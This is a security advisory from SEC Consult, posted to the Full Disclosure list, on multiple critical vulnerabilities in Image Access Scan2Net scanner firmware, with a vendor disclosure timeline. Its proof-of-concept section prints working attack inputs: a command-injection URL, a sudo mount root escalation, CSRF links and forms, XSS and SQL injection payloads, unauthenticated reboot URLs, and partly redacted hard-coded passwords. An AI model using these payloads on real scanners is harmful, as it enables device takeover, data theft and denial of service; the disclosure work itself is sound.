SEC Consult Vulnerability Lab Security Advisory < 20241204-0 > ======================================================================= title: Multiple Critical Vulnerabilities product: Image Access Scan2Net vulnerable version: Firmware <=7.40, <=7.42, <7.42B (depending on the vulnerability) fixed version: mostly fixed in v7.42B CVE number: CVE-2024-28138, CVE-2024-28139, CVE-2024-28140 CVE-2024-28141, CVE-2024-28142, CVE-2024-28143 CVE-2024-28144, CVE-2024-28145, CVE-2024-28146 CVE-2024-47946, CVE-2024-47947, CVE-2024-36498 CVE-2024-36494, CVE-2024-50584 impact: critical vendor homepage: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en advisory URL: https://r.sec-consult.com/imageaccess found: 2023-06-22 by: Daniel Hirschberger (Office Bochum) Tobias Niemann (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Scan2Net® - The Ultimate Scanning Technology - Better than just another client software package - Integrates into existing networks without additional drivers or PCs - Unrivaled performance, highest security, low connectivity cost The Scan2Net® platform is the technological foundation of all WideTEK® and Bookeye® scanners from Image Access. It replaces the proprietary scanner drivers and software that traditional scanners require with the fastest common, nonproprietary connection available: TCP/IP over Ethernet. With network interface speeds much higher than USB or SCSI, Scan2Net devices are able to reach unrivaled performance at very low connectivity cost. The Linux based operating system is dedicated to scanner specific imaging and mechanical control tasks, further maximizing scanning speeds and performance." Source: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en Business recommendation: ------------------------ The vendor provides a firmware update to version 7.42B which should be installed immediately. SEC Consult could only partially verify the correction of all identified vulnerabilities. Some vulnerabilities have not been fixed by the vendor as the risk was accepted. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) OS Command Injection (CVE-2024-28138) An unauthenticated attacker with network access to the scanner can execute any system command via the "msg_events.php" script as the www-data user. 2) Privilege Escalation (CVE-2024-28139) The www-data user can elevate his privileges because sudo is configured to allow the execution of the mount command as root without a password. Therefore, the privileges can be escalated to the root user. 3) Violation of Least Privilege Principle (CVE-2024-28140) The scanner boots into a kiosk mode by default and opens the Scan2Net interface in a browser window. This browser is run with the permissions of the root user. There are also several other applications running as root user, some of them are self-developed ones but those could not be exploited at first glance. 4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141) The web application is not protected against cross-site request forgery attacks. Therefore, an attacker can trick users into performing actions on the application when they visit an attacker-controlled website or click on a malicious link. 5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947) Due to missing input sanitization, an attacker can perform cross-site-scripting attacks and run arbitrary Javascript in the browser of other users. 6) Insecure Password Change Function (CVE-2024-28143) The password change function does not require the current password, which makes the application vulnerable to account takeover, especially if combined with the CSRF vulnerability. 7) Broken Access Control (CVE-2024-28144) Due to missing access control on the reboot and shutdown functions, an attacker can perform a denial-of-service attack against the application. Furthermore, an attacker who can spoof the IP address and the User-Agent of a logged-in user can takeover the session because of flaws in the self-developed session management. 8) Unauthenticated SQL Injection (CVE-2024-28145) An unauthenticated attacker can perform an SQL injection by accessing the dbconnector.php file and supplying malicious GET parameters. 9) Hard-coded Credentials (CVE-2024-28146) The application uses several hard-coded credentials for protecting the firmware update file and the installed database server. Update 2024-04-02: ------------------ ImageAccess GmbH provided us with an internet-facing test device and we spent some short time verifying the vulnerabilities in their latest firmware (7.40) which should fix the security issues according to the vendor. Unfortunately, most of them are still present and new ones have been discovered. In short: 1) OS Command Injection (CVE-2024-28138, CVE-2024-47946) Fixed, but a new RCE vulnerability has been discovered which requires a session as Poweruser, updated PoC below. The second RCE issue is tracked as CVE-2024-47946. 2) Privilege Escalation (CVE-2024-28139) Still an issue. 3) Violation of Least Privilege Principle (CVE-2024-28140) Still an issue. 4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141) Fixed. The introduced "session_id" cookie is protected with the "SameSite=Strict" cookie flag. This prevents CSRF attacks. 5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498) Original issues are fixed (CVE-2024-28142, CVE-2024-47947), but we discovered a new one, updated PoC below. The new XSS is tracked as CVE-2024-36498. 6) Insecure Password Change Function (CVE-2024-28143) Fixed. The password change function now requires the current password. 7) Broken Access Control (CVE-2024-28144) Still an issue. If two users access the web interface from the same IP they are logged in as the other user. Updated PoC below. 8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584) Original issue fixed, but a new blind SQLi as Poweruser has been found, updated PoC below. The new SQLi is tracked as CVE-2024-50584. 9) Hard-coded Credentials (CVE-2024-28146) Still an issue, credentials can be found in different files. Update 2024-10-14: ------------------ ImageAccess GmbH provided us with an internet-facing test device and we spent some short time verifying the vulnerabilities in their latest firmware (7.42) which should fix the submitted critical security issues according to the vendor. 1) OS Command Injection (CVE-2024-28138, CVE-2024-47946) The new RCE vulnerability is fixed now. 2) Privilege Escalation (CVE-2024-28139) Still an open issue. The risk has been accepted by the vendor because the other critical issues are fixed and shell access is not easily possible anymore. 3) Violation of Least Privilege Principle (CVE-2024-28140) The kiosk browser is no longer running as root but many other custom services still are. 4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141) Fixed. 5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494) The third XSS (CVE-2024-36498) has also been fixed. We discovered a new XSS vulnerability in the login page which only works if the target user is _not_ already logged in, which makes it ideal for login form phishing attempts. The new XSS is tracked as CVE-2024-36494. 6) Insecure Password Change Function (CVE-2024-28143) Fixed. The password change function now requires the current password. 7) Broken Access Control (CVE-2024-28144) Still an issue. 8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584) The blind SQLi as Poweruser has been fixed. 9) Hard-coded Credentials (CVE-2024-28146) Mostly fixed. Many credentials can be found in different files. The most problematic 'support' user had their password rotated and it was not immediately obvious where it is stored now. Proof of concept: ----------------- 1) OS Command Injection (CVE-2024-28138, CVE-2024-47946) An unauthenticated attacker with network access can execute arbitrary commands by visiting the following URL. The HTTP GET parameter "data" is not properly sanitized: https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;$COMMAND For example, the following URL can be used to display information about the current user of the web server: https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;id The following image shows the output of the command: <01_os_command_injection.png> Update 2024-04-02: ------------------ The second issue is now tracked as CVE-2024-47946. The OS command injection as shown above is no longer possible in the new firmware version 7.40. Another possibility to gain remote code execution has been identified if the attacker has access to a valid Poweruser session. Specifically crafted valid PNG files with injected PHP content can be uploaded as desktop backgrounds or lock screens. After the upload, the PHP script is available in the web root. The PHP script executes once the uploaded file is accessed. This allows the execution of arbitrary PHP code and OS commands on the device as "www-data". <01_os_command_injection_new.png> 2) Privilege Escalation (CVE-2024-28139) By executing the command "sudo -l" as the www-data user, it is apparent that this user can be used to escalate privileges to root, as shown in the following figure: <02-sudo-L.png> The following commands can be executed to elevate to root privileges, as shown in the following figure: > sudo mount -o bind /usr/bin/bash /usr/bin/mount > sudo mount <02-sudo_mount.png> 3) Violation of Least Privilege Principle (CVE-2024-28140) Many processes are running with root privileges which violates the principle of Least Privilege. This can be confirmed by running "ps aux" as the root user and observing the output: root /opt/s2n/bin/S2NBrowserV7 --no-sandbox StartUpSelection.html x:0 y:800 w:1920 h:1080 root \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US root \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US [...] Apart from the browser the following binaries are also run with root permissions: vsftpd, smbd, wsdd.py, X11, OpenBox s2n-specific Binaries (copyd, s2ncopy, ocrd, imaged, camd_ucc1, admind, s2nwdd, ledd, wt36keyb, ...). 4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141) The application offers no protection against Cross-Site Request-Forgery. An attacker can therefore forge malicious links to reset the admin password or create new users. 4.1) Reset Admin Password The following link resets the password of the administrator to the value "CSRF2YOU!". The password is base64-encoded (Q1NSRjJZT1Uh). https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm 4.2) Register a new user The following code can be hosted on a malicious page controlled by the attacker. When a user who is logged in as administrator is lured by the attacker to visit this page, a new user "SECtest" with the password "CSRF2YOU!" is automatically created: <html> <body> <form action="https://$SCANNER/cgi/upuserdata.cgi"; method="POST"> <input type="hidden" name="groupid" value="0" /> <input type="hidden" name="username" value="SECtest" /> <input type="hidden" name="pw1" value="CSRF2YOU!" /> <input type="hidden" name="pw2" value="CSRF2YOU!" /> <input type="submit" value="Submit request" /> </form> <script>document.forms[0].submit();</script> </body> </html> The following image shows the result: <04_register_user>.png 5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494) There are at least two identified injection points: 5.1) Scenario 1: Stored XSS via User Settings -> File Name (CVE-2024-28142) a. Login as Scan2Net User. b. Navigate to User Settings -> File Name (https://$SCANNER/cgi/uset.cgi?-cfilename) c. Edit the "Wildcard Character" %2 setting to contain the following payload and reference it in the file name: > <script>alert(document.location)</script> <05-1_xss_scenario_1.png> d. The JavaScript payload will be saved automatically. e. The payload will be triggered on each visit of the User Settings -> File Name page. It is also executed when an admin visits the following page: https://$SCANNER/cgi/uset.cgi?-cfilename <05-2_xss_scenario_1_triggered.png> This attack can even be performed without being logged in because the affected functions are not fully protected. Without logging in, only the file name parameter of the "Default" User can be changed. However, the wildcards can be changed without authentication. To inject the payload, the following two requests have to be submitted. I. Changing the file name of the "Default" user to scan_xss%2.pdf: https://$SCANNER/cgi/chopt.cgi?uset+save_filename+scan_xss%252.pdf+filename+Default II. Changing the Wildcard %2 to the JavaScript payload: https://$SCANNER/cgi/chopt.cgi?fileabb+fileabb_customvalue2+%3Cscript%3Ealert(document.location)%3C/script%3E 5.2) Scenario 2: Stored XSS via the ScanWizard Disclaimer (CVE-2024-47947) The "Edit Disclaimer Text" function of the configuration menu is also vulnerable. Only the users Poweruser and Admin can use this function which is available at the URL https://$SCANNER/cgi/admin.cgi?-rdisclaimer+-apre The JavaScript can be inserted as shown in this image: <05-3_xss_scenario_2_insertion.png> Afterwards, this change has to be applied by clicking on the "Apply" button. From now on the payload will be executed every time the ScanWizard is loaded. The URL of the ScanWizard interface is: https://$SCANNER/ScanWizard.html <05-4_xss_scenario_2_trigger_browser.png> This also includes the ScanWizard which is displayed in the Kiosk-mode browser which is present on the physical touch-enabled display of the scanner itself. <05-4_xss_scenario_2_trigger_touch.png> Update 2024-04-02: ------------------ The third issue is now tracked as CVE-2024-36498. The following text can be inserted as Poweruser into the disclaimer to exploit this issue: %3c%53%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%53%63%72%69%70%74%3e This is the payload <Script>alert(1)</Script> URL-encoded. Update 2024-10-14: ------------------ The fourth issue is now tracked as CVE-2024-36494. A new reflected XSS, which only works on unauthenticated targets, has been found: https://$SCANNER/cgi/slogin.cgi?-tsetup+-uuser%22%20onfocus%3ddocument.body.innerHTML%2B%3dlocation.hash,document.body.innerHTML%2b%3ddocument.body.innerText%20autofocus%20b%3d#<img/src="x"onerror="alert(1)"> Update 2024-11-12: ------------------ The vendor tells us that the latest identified XSS issue should be fixed with version 7.42B. 6) Insecure Password Change Function (CVE-2024-28143) The password change function does not require the user to enter the old password in order to set a new one. As explained in the CSRF finding (4.1), an attacker can use this to forcefully set a new password for a user without knowing the old password. The following link sets the password of the user, who clicks on it, to the value "CSRF2YOU!" which is "1Q1NSRjJZT1Uh" when encoded with base64. https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm 7) Broken Access Control (CVE-2024-28144) 7.1) Reboot and Shutdown functions The functions "reboot" and "shutdown" can be called without any authorization checks nor any authentication: https://$SCANNER/cgi/shutdown.cgi https://$SCANNER/cgi/reboot.cgi The authorization checks are also missing on the User Settings -> File Name and the dbconnector as described in chapter 5.1 and 8 respectively. 7.2) Broken Session Management Scan2Net implements a custom algorithm for the session management. The algorithm is implemented the following way: > SID1="$(/opt/s2n/bin/hide -s -e -i "$REMOTE_ADDR:$HTTP_USER_AGENT" -p $HOSTNAME)" The result is stored in the database as the current session ID. On each access request to Scan2Net the SID1 is calculated and compared to the stored session ID in the database. This also means that only one user can be logged in at any time. Furthermore, an attacker who is able to spoof the IP address of a victim and knows the User Agent which was used to login, can take over the session of the victim. Update 2024-04-02: ------------------ The session management is still broken. Start two browsers of your choice (this example will use Chrome and Firefox). Browse to https://$SCANNER_IP/cgi/config.cgi in both browsers. Notice that you are not logged in in both ones and your "login level" is "Default". Login in Chrome as Poweruser. Refresh the page in Firefox and notice that your login level now displays "Poweruser". Browse to https://$SCANNER/cgi/slogin.cgi?-tsetup+-uPoweruser in Firefox and click on "Edit Disclaimer Text". You will get the following error message: <07-1_edit_disclaimer.png> <07-2_authentication_error.png> In Firefox browse to https://$SCANNER_IP/ScanWizard.html, then https://$SCANNER_IP/cgi/setupmenu.cgi and click on "Edit Disclaimer Text" once more. This time you can edit the disclaimer. 8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584) An unauthenticated attacker can reach the database connector at the following URL: https://$SCANNER/class/dbconnect.php The connector accepts several query parameters: > action, search, table, field, value Of those, the parameters search, table, field, and value are vulnerable against SQL injection. For example, one SQL injection can be performed on the parameter "field" with the UNION keyword. The following request returns the version of the used SQL database server by union selecting "@@version": http://$SCANNER/class/dbconnect.php?action=getdbvalue&search=singlemode&table=user_touchscreen&field=configuration_name%20UNION%20ALL%20SELECT%20@@version--%20-&value=ScanWizard The web server responds with: > HTTP/1.1 200 OK > […] > 10.3.38-MariaDB-0+deb10u1 The database is accessed with the rights of the user "s2n". Update 2024-04-02: ------------------ The second issue is now tracked as CVE-2024-50584. The injection point shown above has been fixed in the new firmware (7.40), but a new exploitable injection point was discovered in template_io.php. An attacker with an active session as Poweruser can access the following URL: https://$SCANNER/class/template_io.php The PHP script processes the following query parameters: > action, table, templates The templates parameter is vulnerable against blind boolean-based SQL injection attacks. SQL syntax must be injected into the JSON syntax of the templates parameter. As a short proof of concept the following three requests can be sent: https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default"} https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1336--+A"} https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1337--+A"} For the 1st (no injection) and 3rd (true condition) request the server responds with the identical ZIP file in the response: > HTTP/1.1 200 OK > […] > Content-Length: 1699 > PK[…] Only the response from the 2nd request (false condition) differs in length and content. This indicates that the injected SQL is processed by the database: > HTTP/1.1 200 OK > […] > Content-Length: 1268 > PK[…] The vulnerability was successfully exploited to exfiltrate data from the connected database. As before, the database is accessed with the db user "s2n". 9) Hard-coded Credentials (CVE-2024-28146) After obtaining root access to the scanner, the system could be examined and checked for hard-coded credentials. The found credentials are used to encrypt config files during backup, decrypt the new firmware during an update and some of the listed passwords allow a direct connection to the database server of the scanner. | File | Usage | Username | Password | | ----------------------------------- | ----------------------------- | -------- | ------------- | | /opt/s2n/www/cgi/infoio.cgi | Encryption of exported config | - | !Ba[REDACTED] | | /opt/s2n/www/cgi/sysupd-1 | Encryption of firmware update | - | Gle[REDACTED] | | /opt/s2n/www/cgi/sysupd-2 | Encryption of firmware update | - | Gli[REDACTED] | | /opt/s2n/www/cgi/sysupd-3 | Encryption of firmware update | - | Bet[REDACTED] | | /opt/s2n/www/cgi/sysupd-7 | Encryption of firmware update | - | 201[REDACTED] | | /opt/s2n/www/class/LocaleImport.php | login for database | support | HDD[REDACTED] | | /opt/s2n/www/class/DBmysqli.php | login for database | s2n | fsc[REDACTED] | | /opt/s2n/www/class/dbconnect.php | login for database | mysql | MK2[REDACTED] | Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test in 2023: * Firmware 7.31L on a WideTEK 36CL-600 Scanner All previous versions of Scan2Net before 7.40 are affected, which are used in WideTEK or Bookeye scanners. SEC Consult was provided access to a patched scanner device by the vendor with firmware 7.40 in March 2024. It was briefly verified whether the security issues were properly fixed, but it was identified that most security issues are still present in the latest version. Furthermore, the most recent firmware version 7.42 was rechecked in October 2024. Most critical security issues have been fixed, but some issues are still open. Vendor contact timeline: ------------------------ 2023-06-22: Penetration test at our customer is done, we offer to start the responsible disclosure process with the vendor. Customer wants to do the responsible disclosure process themselves. 2023-07-10: We ask if there is an update from the vendor; Customer informs us that there is no update yet. 2023-07-10: Customer informs us that the vendor is cooperative and working on a timeline for the remediation of the vulnerabilities. 2023-09-18: Because of an unrelated project we ask the customer if we should start a responsible disclosure process for that other project; Customer wants us to do the responsible disclosure process because they are currently lacking the resources to do it themselves. This also includes yet another, unrelated, older project; We ask if we should also start a responsible disclosure process for <this> project. 2023-09-22: Customer gives us permission for this project as well. 2023-11-28: Contacting vendor via support () imageaccess de; no response. 2023-12-18: Contacting vendor again via support () imageaccess de 2023-12-21: Support requests device name, serial number and firmware version. 2023-12-22: We provide the device name and firmware version, don't have serial number; no response from vendor. 2024-01-17: Asking vendor again where to send the advisory, if encryption is supported; no response. 2024-02-07: Submitting this case to German CERT-Bund/BSI via CVD including advisory details. 2024-02-09: Response from CERT-Bund, trying to establish contact with vendor. 2024-02-19: Response from CERT-Bund, vendor provides version 7.40 which fixes the issues. 2024-02-19: Asking whether the advisory was sent to the vendor by CERT-Bund, trying to clarify how to verify the fix and which devices and firmware versions are affected. Preparing CVE reservation. 2024-03-04: Vendor responds to CERT-Bund and keeps SEC Consult in CC. Users can download the firmware themselves via the download page. 2024-03-05: Asking about affected devices (Scan2net WideTEK, Bookeye, etc). Reserving CVE numbers and sending them to vendor. 2024-03-12: Detailed vendor response, providing internet-facing test device to verify the latest firmware version 7.40. 2024-03-25: Briefly verifying latest firmware version, most security issues still present. Updating security advisory. 2024-04-02: Sending updated advisory to vendor, asking for a meeting. No response. 2024-04-12: Asking whether email was received and to schedule a meeting. 2024-04-16: Productive conference call, further explained open security issues, updated firmware version scheduled for mid May. 2024-05-23: Asking for a status update. No response. 2024-06-11: Asking for a status update again. Vendor: New version should be available by end of the week. 2024-06-18: Vendor informs us that new version is available and should fix all reported issues. 2024-09-26: Requesting access to test system again to verify fix (delay because of longer vacation period) 2024-09-26: Quick vendor response, providing access to test system again. 2024-09-27: Apologizing for delay because of vacations/absences, recheck will be performed soon. 2024-09-27: Vendor provides updated version information, latest version is currently v7.42. 2024-10-14: Recheck of latest firmware version. 2024-10-15: Informing vendor about the open issues, providing current draft advisory. Asking about next steps/accepted risks. 2024-10-28: Asking for a status update. 2024-11-11: Asking for a status update. 2024-11-12: Vendor tells us that 7.42B should fix the newest XSS. We state that we no longer have capacities for further rechecks. 2024-11-29: Sending latest advisory draft to vendor, proposing release date for 2024-12-04; Vendor accepts the publication date and mentions that they want to release a bugfix for issue #7 this week. 2024-12-04: Public disclosure of security advisory. Solution: --------- The vendor provides a firmware update to version 7.42B which can be downloaded via the vendor's customer server portal: https://www.imageaccess.de/?page=SupportPortal&lang=en This version fixes most of the identified issues. Only a few issues remain, where the vendor has accepted the risk or is going to patch it in the future. Workaround: ----------- None Advisory URL: ------------- https://r.sec-consult.com/imageaccess ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Daniel Hirschberger, Tobias Niemann, Johannes Greil / @2024
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/